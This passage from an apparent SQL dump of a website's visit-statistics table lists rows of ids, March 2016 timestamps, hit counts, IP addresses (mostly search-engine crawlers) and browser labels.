0,'141.8.142.41','other'),(19699,1457826273,4,4,0,0,'141.8.142.10','other'),(19700,1457826274,1,1,0,0,'5.255.253.110','other'),(19701,1457826276,2,2,0,0,'5.255.253.100','other'),(19702,1457826278,1,1,0,0,'130.193.51.91','other'),(19703,1457826288,1,1,0,0,'5.255.253.62','other'),(19704,1457826343,3,3,0,0,'174.34.135.242','other'),(19705,1457826671,1,1,0,0,'62.210.215.100','chrome'),(19706,1457826675,2,2,0,0,'5.255.253.53','other'),(19707,1457826676,2,2,0,0,'141.8.132.2','other'),(19708,1457826680,1,1,0,0,'130.193.51.55','other'),(19709,1457826683,1,1,0,0,'5.255.253.10','other'),(19710,1457826686,1,1,0,0,'141.8.183.14','other'),(19711,1457826690,3,3,0,0,'93.158.152.9','other'),(19712,1457826714,1,1,0,0,'5.255.253.9','other'),(19714,1457826730,1,1,0,0,'130.193.51.81','other'),(19715,1457826737,1,1,0,0,'5.255.253.79','other'),(19717,1457826861,1,1,0,0,'130.193.51.43','other'),(19718,1457826906,2,2,0,0,'157.55.39.101','other'),(19719,1457826994,1,1,0,0,'178.154.189.6','other'),(19720,1457827073,2,0,2,0,'66.249.66.166',''),(19721,1457827222,2,2,0,0,'51.255.207.3','other'),(19722,1457827289,1,1,0,0,'217.69.133.84','other'),(19723,1457827456,3,3,0,0,'82.193.127.15','other'),(19724,1457827797,2,0,2,0,'66.249.66.162',''),(19725,1457828185,2,2,0,0,'130.193.37.27','other'),(19726,1457828186,5,5,0,0,'141.8.183.14','other'),(19728,1457828187,1,1,0,0,'93.158.152.26','other'),(19729,1457828188,1,1,0,0,'141.8.132.97','other'),(19730,1457828189,1,1,0,0,'5.255.253.30','other'),(19731,1457828190,2,2,0,0,'141.8.142.41','other'),(19733,1457828191,1,1,0,0,'130.193.51.43','other'),(19734,1457828193,1,1,0,0,'141.8.142.10','other'),(19735,1457828196,1,1,0,0,'5.255.253.100','other'),(19737,1457828197,1,1,0,0,'130.193.51.81','other'),(19738,1457828198,1,1,0,0,'141.8.142.88','other'),(19739,1457828376,2,0,2,0,'66.249.66.158',''),(19740,1457828695,12,12,0,0,'141.8.184.18','other'),(19741,1457828696,16,16,0,0,'178.154.149.11','other'),(19742,1457828719,1,1,0,0,'141.8.132.99','other'),(19743,1457828721,4,4,0,0,'130.193.37.21','other'),(19744,1457828725,1,1,0,0,'5.255.253.53','other'),(19745,1457828733,1,1,0,0,'93.158.152.9','other'),(19746,1457828800,2,0,2,0,'66.249.66.166',''),(19747,1457828812,1,0,1,0,'66.249.66.133',''),(19748,1457829054,1,0,1,0,'66.249.66.129',''),(19749,1457829063,1,0,1,0,'66.249.66.190',''),(19750,1457829440,1,1,0,0,'8.29.198.25','other'),(19751,1457829542,1,0,1,0,'68.180.229.104',''),(19752,1457829651,3,0,3,0,'66.249.66.162',''),(19753,1457830336,2,0,2,0,'66.249.66.158',''),(19754,1457830588,1,0,1,0,'66.249.66.166',''),(19755,1457830743,2,2,0,0,'141.8.184.18','other'),(19756,1457830744,1,1,0,0,'5.255.253.53','other'),(19758,1457830745,1,1,0,0,'130.193.37.21','other'),(19759,1457830746,3,3,0,0,'93.158.152.9','other'),(19760,1457830747,1,1,0,0,'178.154.149.11','other'),(19761,1457830750,1,1,0,0,'141.8.183.14','other'),(19762,1457830954,1,1,0,0,'217.69.133.220','other'),(19763,1457830959,1,1,0,0,'157.55.39.101','other'),(19764,1457831104,2,0,2,0,'66.249.66.162',''),(19765,1457831296,1,1,0,0,'171.13.14.29','other'),(19766,1457831371,1,1,0,0,'66.249.92.95','other'),(19767,1457831462,1,0,1,0,'66.249.66.133',''),(19768,1457831637,1,1,0,0,'94.154.239.69','other'),(19769,1457832154,2,0,2,0,'66.249.66.166',''),(19770,1457832238,1,1,0,0,'164.132.161.78','other'),(19771,1457832420,2,0,2,0,'66.249.66.162',''),(19772,1457832621,1,1,0,0,'217.69.133.216','other'),(19774,1457832622,1,1,0,0,'217.69.133.217','other'),(19775,1457832998,1,0,1,0,'66.249.66.133',''),(19776,1457833039,4,4,0,0,'141.8.184.22','other'),(19777,1457833040,4,4,0,0,'5.255.253.110','other'),(19778,1457833041,3,3,0,0,'5.255.253.55','other'),(19780,1457833042,3,3,0,0,'141.8.142.8','other'),(19781,1457833043,3,3,0,0,'141.8.183.14','other'),(19782,1457833044,3,3,0,0,'130.193.37.21','other'),(19784,1457833045,2,2,0,0,'5.255.253.10','other'),(19785,1457833046,3,3,0,0,'141.8.142.10','other'),(19786,1457833049,3,3,0,0,'130.193.37.27','other'),(19787,1457833052,2,2,0,0,'130.193.51.45','other'),(19788,1457833173,2,1,1,0,'66.249.66.158',''),(19789,1457833371,5,5,0,0,'80.91.162.99','other'),(19790,1457833486,1,1,0,0,'93.158.152.26','other'),(19792,1457833488,1,1,0,0,'5.255.253.9','other'),(19794,1457833490,1,1,0,0,'141.8.132.97','other'),(19795,1457833491,1,1,0,0,'130.193.51.102','other'),(19796,1457833492,1,0,1,0,'66.249.66.162',''),(19797,1457833493,1,1,0,0,'141.8.142.88','other'),(19799,1457833495,1,1,0,0,'141.8.132.76','other'),(19800,1457833496,1,1,0,0,'141.8.132.79','other'),(19801,1457833497,1,1,0,0,'141.8.142.41','other'),(19802,1457833498,1,1,0,0,'130.193.51.85','other'),(19803,1457833499,1,1,0,0,'141.8.184.18','other'),(19804,1457833500,1,1,0,0,'178.154.149.11','other'),(19805,1457833501,1,1,0,0,'93.158.152.9','other'),(19806,1457833502,1,1,0,0,'5.255.253.53','other'),(19807,1457833504,1,1,0,0,'141.8.132.99','other'),(19809,1457833574,1,1,0,0,'40.77.167.58','other'),(19810,1457833612,1,1,0,0,'207.46.13.94','other'),(19811,1457833828,2,0,2,0,'66.249.66.166',''),(19812,1457834056,3,1,2,0,'66.249.66.158',''),(19813,1457835600,2,0,2,0,'66.249.66.162',''),(19814,1457835860,1,1,0,0,'180.76.15.30','other'),(19815,1457835976,1,1,0,0,'5.255.253.55','other'),(19817,1457835978,1,1,0,0,'141.8.183.14','other'),(19818,1457835979,1,1,0,0,'141.8.132.99','other'),(19819,1457835980,2,2,0,0,'141.8.132.2','other'),(19820,1457835981,1,1,0,0,'141.8.142.10','other'),(19822,1457836112,1,1,0,0,'5.255.253.100','other'),(19823,1457836113,1,1,0,0,'130.193.51.45','other'),(19825,1457836115,1,1,0,0,'5.255.253.10','other'),(19827,1457836435,2,0,2,0,'66.249.66.158',''),(19828,1457836535,1,1,0,0,'217.69.133.226','other'),(19830,1457836745,9,9,0,0,'82.193.127.15','other'),(19831,1457836755,1,1,0,0,'217.69.133.215','other'),(19832,1457836756,1,1,0,0,'217.69.133.85','other'),(19833,1457837405,3,0,3,0,'66.249.66.158',''),(19834,1457837857,1,0,1,0,'66.249.66.129',''),(19835,1457838014,2,0,2,0,'66.249.66.166',''),(19836,1457838074,1,1,0,0,'62.210.215.100','chrome'),(19837,1457838199,1,1,0,0,'51.255.65.16','other'),(19838,1457838209,3,3,0,0,'141.8.184.18','other'),(19839,1457838210,3,3,0,0,'178.154.149.11','other'),(19840,1457838212,1,1,0,0,'207.46.13.105','other'),(19841,1457838222,1,1,0,0,'5.255.253.100','other'),(19842,1457838223,1,1,0,0,'5.255.253.53','other'),(19843,1457838434,3,3,0,0,'207.46.13.94','other'),(19844,1457839213,2,0,2,0,'66.249.66.158',''),(19845,1457839322,1,0,1,0,'66.249.69.11',''),(19846,1457839449,1,1,0,0,'51.255.65.79','other'),(19847,1457839632,1,0,1,0,'66.249.66.133',''),(19848,1457839665,1,0,1,0,'66.249.66.162',''),(19849,1457839788,1,0,1,0,'66.249.66.166',''),(19850,1457839875,10,10,0,0,'141.8.184.18','other'),(19851,1457839876,15,15,0,0,'178.154.149.11','other'),(19852,1457840038,1,1,0,0,'66.249.66.166','other'),(19853,1457840120,1,1,0,0,'207.46.13.105','other'),(19854,1457840246,1,1,0,0,'8.29.198.25','other'),(19855,1457840486,2,2,0,0,'5.255.253.53','other'),(19856,1457840487,2,2,0,0,'93.158.152.9','other'),(19857,1457840489,3,3,0,0,'130.193.37.21','other'),(19858,1457840490,1,1,0,0,'141.8.132.99','other'),(19859,1457840497,2,2,0,0,'141.8.183.14','other'),(19860,1457840501,1,1,0,0,'180.76.15.144','other'),(19861,1457840582,1,1,0,0,'51.255.65.41','other'),(19862,1457840717,1,1,0,0,'51.255.65.63','other'),(19863,1457840813,2,0,2,0,'66.249.66.158',''),(19864,1457841395,1,1,0,0,'207.46.13.105','other'),(19865,1457841782,2,0,2,0,'66.249.66.158',''),(19866,1457841837,1,1,0,0,'164.132.161.49','other'),(19867,1457841861,1,1,0,0,'66.249.92.95','other'),(19868,1457841977,1,1,0,0,'178.154.149.11','other'),(19869,1457842015,3,3,0,0,'141.8.184.18','other'),(19870,1457842061,2,0,2,0,'66.249.66.166',''),(19871,1457842103,1,0,1,0,'66.249.66.162',''),(19872,1457842327,1,1,0,0,'164.132.161.83','other'),(19873,1457842482,1,1,0,0,'217.69.133.219','other'),(19874,1457842483,1,1,0,0,'217.69.133.84','other'),(19875,1457842510,1,1,0,0,'164.132.161.46','other'),(19876,1457842632,1,1,0,0,'66.249.66.162','other'),(19877,1457843022,1,1,0,0,'207.46.13.94','other'),(19878,1457843366,3,0,3,0,'66.249.66.166',''),(19879,1457844684,2,0,2,0,'66.249.66.166',''),(19880,1457844897,1,1,0,0,'66.249.66.162','other'),(19881,1457845238,1,1,0,0,'40.77.167.58','other'),(19882,1457845634,2,2,0,0,'82.193.127.15','other'),(19883,1457845848,1,0,1,0,'66.249.66.162',''),(19884,1457846026,6,6,0,0,'141.8.184.18','other'),(19885,1457846027,5,5,0,0,'178.154.149.11','other'),(19886,1457846062,1,1,0,0,'141.8.183.14','other'),(19887,1457846894,1,1,0,0,'164.132.161.94','other'),(19888,1457847076,1,0,1,0,'66.249.66.162',''),(19889,1457847947,1,1,0,0,'207.46.13.105','other'),(19890,1457848015,2,2,0,0,'141.8.184.18','other'),(19891,1457848016,1,1,0,0,'141.8.183.14','other'),(19892,1457848017,2,2,0,0,'178.154.149.11','other'),(19893,1457848302,1,1,0,0,'217.69.133.218','other'),(19894,1457848351,1,0,1,0,'66.249.66.166',''),(19895,1457848420,2,0,2,0,'66.249.66.158',''),(19896,1457848422,1,1,0,0,'40.77.167.58','other'),(19897,1457848498,1,1,0,0,'130.193.51.43','other'),(19898,1457848500,1,1,0,0,'93.158.152.26','other'),(19899,1457848501,1,1,0,0,'5.255.253.9','other'),(19900,1457848502,1,1,0,0,'141.8.184.22','other'),(19901,1457848923,1,1,0,0,'66.249.66.158','other'),(19902,1457849342,1,1,0,0,'217.69.133.84','other'),(19903,1457849478,1,0,1,0,'66.249.66.162',''),(19904,1457849972,1,1,0,0,'51.255.65.7','other'),(19905,1457850035,1,1,0,0,'217.69.133.67','other'),(19906,1457850173,2,0,2,0,'66.249.66.129',''),(19907,1457850177,1,1,0,0,'46.133.235.12','other'),(19908,1457850375,1,1,0,0,'62.210.215.100','chrome'),(19909,1457850509,1,1,0,0,'130.193.51.81','other'),(19910,1457850545,2,0,2,0,'66.249.66.158',''),(19911,1457850651,1,1,0,0,'66.249.66.166','other'),(19912,1457850896,1,0,1,0,'66.249.66.162',''),(19913,1457851076,1,1,0,0,'8.29.198.25','other'),(19914,1457851182,1,1,0,0,'178.49.154.55','chrome'),(19915,1457851399,1,1,0,0,'40.77.167.58','other'),(19916,1457851455,1,0,1,0,'66.249.66.129',''),(19917,1457852200,1,0,1,0,'66.249.66.158',''),(19918,1457852250,1,1,0,0,'66.249.92.95','other'),(19919,1457852277,1,0,1,0,'66.249.66.162',''),(19920,1457852636,1,1,0,0,'217.69.133.225','other'),(19921,1457852957,2,2,0,0,'130.193.37.21','other'),(19923,1457852958,2,2,0,0,'5.255.253.100','other'),(19925,1457852959,1,1,0,0,'130.193.51.43','other'),(19926,1457852960,2,2,0,0,'141.8.132.2','other'),(19927,1457852961,2,2,0,0,'5.255.253.10','other'),(19929,1457852962,2,2,0,0,'141.8.184.11','other'),(19930,1457852963,2,2,0,0,'141.8.142.10','other'),(19932,1457852964,2,2,0,0,'130.193.51.81','other'),(19933,1457852965,1,1,0,0,'141.8.184.22','other'),(19934,1457852966,1,1,0,0,'141.8.132.97','other'),(19936,1457852974,1,1,0,0,'93.158.152.26','other'),(19937,1457852976,1,1,0,0,'141.8.132.76','other'),(19938,1457853230,1,0,1,0,'66.249.66.162',''),(19939,1457853411,1,1,0,0,'207.46.13.105','other'),(19940,1457853425,1,1,0,0,'217.69.133.221','other'),(19941,1457853509,2,2,0,0,'141.8.142.8','other'),(19943,1457853510,1,1,0,0,'5.255.253.53','other'),(19944,1457853514,1,1,0,0,'130.193.51.102','other'),(19945,1457853515,1,1,0,0,'5.255.253.30','other'),(19946,1457853516,1,1,0,0,'130.193.37.27','other'),(19947,1457853517,1,1,0,0,'141.8.183.14','other'),(19948,1457853519,1,1,0,0,'130.193.51.45','other'),(19949,1457853536,1,1,0,0,'91.124.182.203','firefox'),(19950,1457853800,1,1,0,0,'46.201.134.255','chrome'),(19951,1457854117,1,1,0,0,'180.76.15.146','other'),(19952,1457854465,1,1,0,0,'51.255.65.43','other'),(19953,1457854597,1,0,1,0,'66.249.66.133',''),(19954,1457854656,4,4,0,0,'46.165.197.142','other'),(19955,1457854836,1,1,0,0,'91.196.178.101','chrome'),(19956,1457855326,2,2,0,0,'77.91.160.172','other'),(19957,1457855554,1,1,0,0,'5.255.253.110','other'),(19958,1457855555,1,1,0,0,'141.8.142.41','other'),(19959,1457855556,1,1,0,0,'141.8.184.18','other'),(19960,1457855557,1,1,0,0,'141.8.132.99','other'),(19961,1457855678,1,0,1,0,'66.249.66.158',''),(19962,1457855751,2,0,2,0,'68.180.229.33',''),(19963,1457855802,1,1,0,0,'51.255.65.22','other'),(19964,1457856186,1,1,0,0,'37.9.122.201','other'),(19965,1457856394,4,4,0,0,'82.193.127.15','other'),(19966,1457856942,1,1,0,0,'193.194.127.217','firefox'),(19967,1457856971,1,1,0,0,'66.102.9.94','chrome'),(19968,1457857200,1,1,0,0,'164.132.161.95','other'),(19969,1457857449,2,0,2,0,'66.249.66.158',''),(19970,1457857667,1,0,1,0,'66.249.66.166',''),(19971,1457858800,1,1,0,0,'207.46.13.94','other'),(19972,1457858820,1,1,0,0,'46.219.10.41','other'),(19973,1457858826,1,1,0,0,'51.255.65.77','other'),(19974,1457859200,1,1,0,0,'78.111.190.22','chrome'),(19975,1457859222,1,1,0,0,'217.69.133.222','other'),(19976,1457859223,1,1,0,0,'217.69.133.223','other'),(19977,1457859224,1,1,0,0,'217.69.133.224','other'),(19978,1457859630,1,1,0,0,'217.69.133.85','other'),(19979,1457860168,1,0,1,0,'66.249.66.158',''),(19980,1457860319,3,3,0,0,'130.193.37.21','other'),(19981,1457860320,7,7,0,0,'178.154.149.11','other'),(19982,1457860321,4,4,0,0,'5.255.253.53','other'),(19984,1457860322,2,2,0,0,'141.8.184.18','other'),(19985,1457860485,1,1,0,0,'207.46.13.105','other'),(19986,1457860725,2,2,0,0,'207.46.13.94','other'),(19987,1457860897,1,1,0,0,'217.69.133.215','other'),(19988,1457861148,4,4,0,0,'93.158.152.9','other'),(19989,1457861152,3,3,0,0,'141.8.183.14','other'),(19990,1457861194,1,0,1,0,'66.249.66.162',''),(19991,1457861429,1,1,0,0,'40.77.167.58','other'),(19992,1457861485,1,0,1,0,'66.249.66.158',''),(19993,1457861798,2,0,2,0,'66.249.66.133',''),(19994,1457861927,1,1,0,0,'8.29.198.25','other'),(19995,1457862223,3,0,3,0,'66.249.66.162',''),(19996,1457862460,1,1,0,0,'180.76.15.161','other'),(19997,1457862506,1,1,0,0,'180.76.15.138','other'),(19998,1457862609,2,0,2,0,'66.249.66.166',''),(19999,1457862700,2,0,2,0,'66.249.66.158',''),(20000,1457862889,1,0,1,0,'66.249.66.129',''),(20001,1457862892,23,1,22,0,'66.249.66.158',''),(20002,1457862916,1,1,0,0,'62.210.215.100','chrome'),(20003,1457862924,3,0,3,0,'66.249.66.190',''),(20004,1457863111,1,0,1,0,'66.249.66.133',''),(20005,1457863170,1,1,0,0,'66.249.92.95','other'),(20006,1457863448,1,1,0,0,'164.132.161.52','other'),(20007,1457863660,1,1,0,0,'130.193.51.55','other'),(20008,1457863664,1,1,0,0,'141.8.142.10','other'),(20009,1457863668,1,1,0,0,'141.8.142.88','other'),(20010,1457863672,1,1,0,0,'141.8.132.79','other'),(20011,1457863768,2,0,2,0,'66.249.66.162',''),(20012,1457863778,1,0,1,0,'68.180.229.33',''),(20013,1457863935,1,1,0,0,'217.69.133.226','other'),(20014,1457864186,1,1,0,0,'40.77.167.58','other'),(20015,1457864317,1,1,0,0,'164.132.161.31','other'),(20016,1457864533,3,0,3,0,'66.249.66.158',''),(20017,1457864727,1,1,0,0,'207.46.13.94','other'),(20018,1457864893,2,0,2,0,'66.249.66.166',''),(20019,1457865017,1,1,0,0,'91.196.178.39','chrome'),(20020,1457865112,1,1,0,0,'207.46.13.105','other'),(20021,1457865189,1,1,0,0,'130.193.51.45','other'),(20022,1457865192,1,1,0,0,'5.255.253.10','other'),(20023,1457865196,2,2,0,0,'141.8.142.10','other'),(20024,1457865200,1,1,0,0,'141.8.184.22','other'),(20025,1457865203,1,1,0,0,'5.255.253.55','other'),(20026,1457865207,1,1,0,0,'141.8.142.8','other'),(20027,1457865210,1,1,0,0,'141.8.132.99','other'),(20028,1457865214,1,1,0,0,'93.158.152.26','other'),(20029,1457865218,1,1,0,0,'130.193.51.55','other'),(20030,1457865221,1,1,0,0,'141.8.142.82','other'),(20031,1457865225,1,1,0,0,'5.255.253.110','other'),(20032,1457865228,1,1,0,0,'5.255.253.94','other'),(20033,1457865232,2,2,0,0,'178.154.189.12','other'),(20034,1457865235,1,1,0,0,'141.8.132.48','other'),(20035,1457865339,1,1,0,0,'164.132.161.71','other'),(20036,1457865485,1,1,0,0,'141.8.132.74','other'),(20037,1457865490,1,1,0,0,'141.8.132.66','other'),(20038,1457865493,1,1,0,0,'130.193.51.50','other'),(20039,1457865500,1,1,0,0,'5.255.253.30','other'),(20040,1457865503,1,1,0,0,'130.193.51.85','other'),(20041,1457865506,1,1,0,0,'5.255.253.62','other'),(20042,1457865509,1,1,0,0,'141.8.132.44','other'),(20043,1457865542,2,2,0,0,'100.43.85.22','other'),(20044,1457865835,1,1,0,0,'157.55.39.134','other'),(20045,1457866061,1,0,1,0,'66.249.66.162',''),(20046,1457866579,1,0,1,0,'66.249.66.158',''),(20047,1457866774,2,0,2,0,'66.249.66.166',''),(20048,1457866812,1,1,0,0,'51.255.65.67','other'),(20049,1457867250,2,0,2,0,'66.249.66.162',''),(20050,1457867536,3,3,0,0,'136.243.5.87','other'),(20051,1457867543,1,0,1,0,'66.249.66.133',''),(20052,1457868168,1,1,0,0,'51.255.65.88','other'),(20053,1457868352,3,0,3,0,'66.249.66.158',''),(20054,1457868376,1,0,1,0,'66.249.66.166',''),(20055,1457868806,1,1,0,0,'46.211.112.225','other'),(20056,1457869492,1,1,0,0,'207.46.13.105','other'),(20057,1457869567,2,0,2,0,'66.249.66.166',''),(20058,1457869622,2,0,2,0,'66.249.66.158',''),(20059,1457869980,1,0,1,0,'66.249.66.190',''),(20060,1457870000,1,1,0,0,'91.196.178.164','firefox'),(20061,1457870259,4,4,0,0,'141.8.184.18','other'),(20062,1457870757,1,0,1,0,'66.249.66.166',''),(20063,1457870771,3,0,3,0,'66.249.66.162',''),(20064,1457870790,2,0,2,0,'66.249.66.133',''),(20065,1457870793,1,0,1,0,'66.249.66.129',''),(20066,1457870809,8,0,8,0,'66.249.66.158',''),(20067,1457870914,1,0,1,0,'68.180.230.88',''),(20068,1457871190,1,1,0,0,'217.69.133.219','other'),(20069,1457871737,2,0,2,0,'66.249.66.162',''),(20070,1457872015,2,2,0,0,'217.69.133.67','other'),(20071,1457872047,1,1,0,0,'91.196.178.98','chrome'),(20072,1457872410,2,0,2,0,'66.249.66.158',''),(20073,1457872430,2,2,0,0,'93.158.152.9','other'),(20074,1457872433,1,1,0,0,'141.8.184.18','other'),(20075,1457872436,1,1,0,0,'141.8.183.14','other'),(20076,1457872739,1,1,0,0,'8.29.198.25','other'),(20077,1457872753,2,0,2,0,'66.249.66.162',''),(20078,1457873263,1,0,1,0,'68.180.230.88',''),(20079,1457873298,1,1,0,0,'62.210.215.100','chrome'),(20080,1457873772,1,1,0,0,'66.249.92.95','other'),(20081,1457874147,2,0,2,0,'66.249.66.158',''),(20082,1457874221,2,0,2,0,'66.249.66.162',''),(20083,1457874264,1,1,0,0,'51.255.65.23','other'),(20084,1457874360,1,0,1,0,'68.180.230.109',''),(20085,1457874592,1,1,0,0,'51.255.65.61','other'),(20086,1457874662,1,1,0,0,'51.255.65.44','other'),(20087,1457874742,1,0,1,0,'68.180.230.88',''),(20088,1457875000,1,1,0,0,'51.255.65.31','other'),(20089,1457875078,1,1,0,0,'37.73.215.245','chrome'),(20090,1457875123,1,1,0,0,'40.77.167.58','other'),(20091,1457875305,1,1,0,0,'217.69.133.21','other'),(20092,1457875536,2,2,0,0,'217.69.133.224','other'),(20093,1457875596,3,0,3,0,'66.249.66.162',''),(20094,1457876087,1,1,0,0,'217.69.133.218','other'),(20095,1457876648,1,1,0,0,'66.249.66.129','other'),(20096,1457876753,2,2,0,0,'66.249.66.162','other'),(20097,1457877069,2,0,2,0,'66.249.66.166',''),(20098,1457877203,2,0,2,0,'66.249.66.158',''),(20099,1457877816,1,1,0,0,'217.69.133.216','other'),(20100,1457877875,1,1,0,0,'207.46.13.94','other'),(20101,1457877981,1,1,0,0,'141.8.184.18','other'),(20102,1457877983,1,1,0,0,'5.255.253.53','other'),(20103,1457877986,2,2,0,0,'93.158.152.9','other'),(20104,1457878212,1,1,0,0,'157.55.39.134','other'),(20105,1457878914,1,1,0,0,'51.255.65.34','other'),(20106,1457878930,2,2,0,0,'141.8.132.109','other'),(20107,1457878935,2,2,0,0,'5.255.253.53','other'),(20108,1457878943,4,4,0,0,'130.193.51.102','other'),(20109,1457878946,5,5,0,0,'130.193.37.21','other'),(20110,1457878952,4,4,0,0,'5.255.253.100','other'),(20111,1457878957,1,1,0,0,'141.8.132.79','other'),(20112,1457878960,6,6,0,0,'178.154.149.11','other'),(20113,1457878964,3,3,0,0,'130.193.51.55','other'),(20114,1457878970,4,4,0,0,'141.8.132.99','other'),(20115,1457878973,6,6,0,0,'141.8.184.18','other'),(20116,1457879018,1,1,0,0,'130.193.51.43','other'),(20117,1457879032,2,2,0,0,'93.158.152.65','other'),(20118,1457879037,1,1,0,0,'141.8.142.10','other'),(20119,1457879042,5,5,0,0,'141.8.183.14','other'),(20120,1457879056,2,2,0,0,'5.255.253.103','other'),(20121,1457879098,1,0,1,0,'66.249.66.166',''),(20122,1457879202,3,0,3,0,'66.249.66.162',''),(20123,1457879213,1,1,0,0,'141.8.142.55','other'),(20124,1457879217,1,1,0,0,'5.255.253.30','other'),(20125,1457879238,1,1,0,0,'141.8.132.97','other'),(20126,1457879242,1,1,0,0,'130.193.51.109','other'),(20127,1457879262,2,2,0,0,'141.8.184.22','other'),(20128,1457879279,1,1,0,0,'5.255.253.55','other'),(20129,1457879283,1,1,0,0,'93.158.152.9','other'),(20130,1457879312,1,1,0,0,'5.255.253.110','other'),(20131,1457879328,1,1,0,0,'141.8.132.66','other'),(20132,1457879345,1,1,0,0,'130.193.51.85','other'),(20133,1457879380,1,0,1,0,'66.249.66.158',''),(20134,1457879947,1,1,0,0,'178.154.149.11','other'),(20135,1457879952,1,1,0,0,'92.112.104.78','chrome'),(20136,1457880261,1,0,1,0,'68.180.230.88',''),(20137,1457880372,1,0,1,0,'66.249.66.158',''),(20138,1457880594,4,4,0,0,'141.8.183.14','other'),(20139,1457880601,2,2,0,0,'141.8.184.18','other'),(20140,1457880609,2,2,0,0,'93.158.152.9','other'),(20141,1457880613,1,1,0,0,'141.8.142.60','other'),(20142,1457880618,2,2,0,0,'130.193.51.102','other'),(20143,1457880622,1,1,0,0,'141.8.132.109','other'),(20144,1457880626,1,1,0,0,'130.193.51.81','other'),(20145,1457880634,1,1,0,0,'141.8.184.22','other'),(20146,1457880639,1,1,0,0,'141.8.142.55','other'),(20147,1457880643,1,1,0,0,'141.8.142.82','other'),(20148,1457880651,1,1,0,0,'5.255.253.89','other'),(20149,1457880655,1,1,0,0,'141.8.184.11','other'),(20150,1457880667,1,1,0,0,'5.255.253.9','other'),(20151,1457880672,1,1,0,0,'141.8.142.41','other'),(20152,1457880680,1,1,0,0,'5.255.253.55','other'),(20153,1457880684,1,1,0,0,'5.255.253.53','other'),(20154,1457880705,1,1,0,0,'62.149.0.171','other'),(20155,1457880775,3,0,3,0,'66.249.66.162',''),(20156,1457880812,1,0,1,0,'66.249.66.133',''),(20157,1457880931,1,1,0,0,'207.46.13.105','other'),(20158,1457880937,1,0,1,0,'66.249.66.129',''),(20159,1457881260,1,0,1,0,'68.180.230.88',''),(20160,1457881698,3,0,3,0,'66.249.66.166',''),(20161,1457881755,3,0,3,0,'66.249.66.162',''),(20162,1457881845,2,2,0,0,'217.69.133.215','other'),(20163,1457881877,1,1,0,0,'217.69.133.216','other'),(20164,1457882042,2,0,2,0,'66.249.66.158',''),(20165,1457882658,1,1,0,0,'141.8.132.99','other'),(20166,1457882661,1,1,0,0,'141.8.184.11','other'),(20167,1457882721,1,1,0,0,'207.46.13.105','other'),(20168,1457882855,3,0,3,0,'66.249.66.162',''),(20169,1457882870,1,1,0,0,'93.158.152.203','other'),(20170,1457882873,1,1,0,0,'37.9.122.203','other'),(20171,1457882877,1,1,0,0,'37.9.122.201','other'),(20172,1457883093,1,1,0,0,'93.158.152.9','other'),(20173,1457883125,1,0,1,0,'68.180.230.109',''),(20174,1457883195,4,0,4,0,'66.249.66.158',''),(20175,1457883414,2,2,0,0,'109.108.233.84','other'),(20176,1457883438,1,0,1,0,'66.249.66.190',''),(20177,1457883563,1,1,0,0,'217.69.133.67','other'),(20178,1457883592,1,1,0,0,'8.29.198.25','other'),(20179,1457883800,1,1,0,0,'62.210.215.100','chrome'),(20180,1457883849,1,0,1,0,'66.249.66.162',''),(20181,1457884104,1,1,0,0,'207.46.13.105','other'),(20182,1457884261,1,1,0,0,'66.249.92.95','other'),(20183,1457884431,1,1,0,0,'51.255.65.56','other'),(20184,1457884435,2,0,2,0,'66.249.66.158',''),(20185,1457884932,1,1,0,0,'93.158.152.26','other'),(20186,1457884935,1,1,0,0,'93.158.152.9','other'),(20187,1457884939,1,1,0,0,'141.8.132.2','other'),(20188,1457884944,1,1,0,0,'5.255.253.55','other'),(20189,1457884947,1,1,0,0,'130.193.37.27','other'),(20190,1457884952,1,1,0,0,'130.193.51.45','other'),(20191,1457884990,1,0,1,0,'66.249.66.166',''),(20192,1457885461,1,0,1,0,'66.249.66.162',''),(20193,1457885609,3,0,3,0,'66.249.66.158',''),(20194,1457886259,1,1,0,0,'40.77.167.104','other'),(20195,1457886371,1,1,0,0,'66.249.93.90','chrome'),(20196,1457886571,1,1,0,0,'95.133.238.107','chrome'),(20197,1457886675,1,1,0,0,'5.255.253.53','other'),(20199,1457886679,1,1,0,0,'141.8.184.11','other'),(20200,1457886683,2,2,0,0,'130.193.37.27','other'),(20201,1457886688,2,2,0,0,'130.193.51.43','other'),(20202,1457886692,1,1,0,0,'93.158.152.9','other'),(20203,1457886696,1,1,0,0,'141.8.132.76','other'),(20204,1457886881,3,0,3,0,'66.249.66.166',''),(20205,1457886894,2,0,2,0,'66.249.66.162',''),(20206,1457887061,1,0,1,0,'66.249.66.158',''),(20207,1457887132,1,1,0,0,'94.179.36.76','firefox'),(20208,1457887134,1,1,0,0,'130.193.37.21','other'),(20209,1457887140,1,1,0,0,'130.193.51.102','other'),(20210,1457887144,1,1,0,0,'141.8.132.97','other'),(20211,1457887148,2,2,0,0,'93.158.152.26','other'),(20212,1457887157,1,1,0,0,'141.8.132.99','other'),(20213,1457887330,1,1,0,0,'164.132.161.62','other'),(20214,1457887372,1,1,0,0,'217.69.133.218','other'),(20215,1457887594,1,1,0,0,'217.69.133.215','other'),(20216,1457887748,6,6,0,0,'207.46.13.105','other'),(20217,1457888004,1,1,0,0,'40.77.167.11','other'),(20218,1457888029,1,0,1,0,'66.249.66.190',''),(20219,1457888508,3,3,0,0,'207.46.13.184','other'),(20220,1457888672,1,1,0,0,'217.69.133.85','other'),(20221,1457888804,1,1,0,0,'91.196.178.102','chrome'),(20222,1457889056,1,1,0,0,'51.255.65.76','other'),(20223,1457889062,1,1,0,0,'217.69.133.215','other'),(20224,1457889331,1,1,0,0,'5.255.253.100','other'),(20225,1457889334,1,1,0,0,'130.193.51.43','other'),(20226,1457889554,1,0,1,0,'68.180.230.88',''),(20227,1457890185,2,0,2,0,'66.249.66.166',''),(20228,1457890487,1,0,1,0,'66.249.66.129',''),(20229,1457891391,1,1,0,0,'141.8.142.10','other'),(20230,1457891392,1,1,0,0,'130.193.51.102','other'),(20232,1457891657,2,0,2,0,'66.249.66.166',''),(20233,1457891773,1,0,1,0,'68.180.230.88',''),(20234,1457891963,1,1,0,0,'217.69.133.221','other'),(20235,1457892176,1,1,0,0,'207.46.13.184','other'),(20236,1457892204,1,0,1,0,'66.249.66.158',''),(20237,1457892273,1,1,0,0,'66.249.66.158','other'),(20238,1457892451,1,1,0,0,'178.154.149.9','other'),(20239,1457892452,1,1,0,0,'130.193.51.85','other'),(20241,1457892453,1,1,0,0,'130.193.50.31','other'),(20243,1457892455,1,1,0,0,'5.255.253.53','other'),(20244,1457892458,1,1,0,0,'130.193.37.21','other'),(20245,1457892485,1,1,0,0,'217.69.133.225','other'),(20246,1457892788,1,1,0,0,'217.69.133.215','other'),(20247,1457892944,1,1,0,0,